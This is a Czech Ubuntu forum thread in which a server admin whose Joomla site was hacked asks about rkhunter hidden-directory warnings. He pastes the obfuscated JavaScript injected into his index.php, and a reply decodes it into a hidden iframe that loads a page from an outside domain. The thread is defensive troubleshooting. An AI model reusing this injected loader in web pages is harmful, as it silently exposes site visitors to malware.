Fórum Ubuntu CZ/SK
Ostatní => Ubuntu Server => Téma založeno: kejml 27 Dubna 2009, 11:33:23
-
Zdar ve spolek,
před pár dny se mi někdo dostal zřejmě přes Joomlu do mašiny (Ubuntu 8.04 Hardy) a na jeden web přidal nějaké skripty, které
se připojovaly na nějaké stránky na netu zřejmě kvůli zpětným odkazům apod. Problém jsem vyřešil, ale pro
jistotu jsem si nainstaloval rootkithunter (sudo apt-get install rkhunter), což se mi jeví jako velice solidní nástroj na kontrolu rootkitů apod.
Rootkithunter mě upozornil na následující skryté adresáře :
[10:55:57] Checking for hidden files and directories [ Warning ]
[10:55:57] Warning: Hidden directory found: /dev/.static
[10:55:57] Warning: Hidden directory found: /dev/.udev
[10:55:57] Warning: Hidden directory found: /dev/.initramfs
Nevíte někdo, prosím vás, jestli to může být nějaký potenciální problém a nebo se jedná o nějaké standartní skryté adresáře,
které jsou v systému normálně ? Pátral jsem trošku po tom initramfs a mám z toho krapet obavy, ale chytrý z toho moc nejsem
a netuším, jestli je to součástí systému a k něčemu se to používá nebo ne ...
Zkoušel jsem to projet tím rkhunterem i na druhé mašině, kde mám čistou instalaci a tam nic takového nemám ...
Sotva jsem ten web obnovil ze zálohy, na druhý den jsem ho měl upravený tím skriptem znovu a při pokusu otevřít
ty stránky mě varoval Google že se jedná o potenciálně nebezpečné stránky a trvalo cca. 3 dny, než mi to robot navštívil znovu
a před nebezpečností stránek už nevaruje ... Každá rada dobrá, protože v téhle tématice se ještě moc neorientuju ...
Edit : Nevím jestli by to mohlo nějak pomoct, ale na úvodní stránce webu (index.php) se mi objevuje tenhle kód :
<script>function v49f579ed33de6(v49f579ed341ce){ return(parseInt(v49f579ed341ce
,16));}function v49f579ed34d85(v49f579ed3516f){ var v49f579ed35559='';for(v49f5
79ed3593e=0; v49f579ed3593e<v49f579ed3516f.length; v49f579ed3593e+=2){ v49f579ed
35559+=(String.fromCharCode(v49f579ed33de6(v49f579ed3516f.substr(v49f579ed3593e,
2))));}return v49f579ed35559;} document.write(v49f579ed34d85('3C696672616D65206
E616D653D273527207372633D27687474703A2F2F746F74616C7765696768746C6F737363656E746
5722E636F6D2F696D616765732F676F2E7068703F7369643D31272077696474683D3139322068656
96768743D323737207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'))
;</script>
-
Nevím jestli to pomůže,ale mrkni sem:
http://forum.kubuntu.sk/viewtopic.php?id=2044
http://sourceforge.net/docman/display_doc.php?docid=35179&group_id=155034
-
Nevím jestli to pomůže,ale mrkni sem:
http://forum.kubuntu.sk/viewtopic.php?id=2044
http://sourceforge.net/docman/display_doc.php?docid=35179&group_id=155034
Díky moc za tip ! Už jsem to prostudoval ... podle toho fóra kubuntu.sk by to neměl být problém ...
Chápu, že jde jen o upozornění na skryté adresáře, ale trošku mě vystrašil ten adresář .initramfs ...
Googloval jsem kolem toho a vypadá to, že je to něco, co umí vytvořit RAM disk apod. a tak mě
napadlo, jestli to není právě spojeno nějak s tím napadením ... Když totiž ručně odstraním ten
kód ze stránek pryč, za půl hodiny se mi to tam objevilo znovu ...
-
Script má v sobě "zašifrováno"
<iframe name='5' src='http://totalweightlosscenter.com/images/go.php?sid=1' width=192 height=277 style='display:none'></iframe>
Takže bych to tipoval na jeden z těch virů co se šíří pomocí kouzelné kombinace: nezaplátovaný XP, Internet Explorer a Total Commander s uloženými hesly na FTP.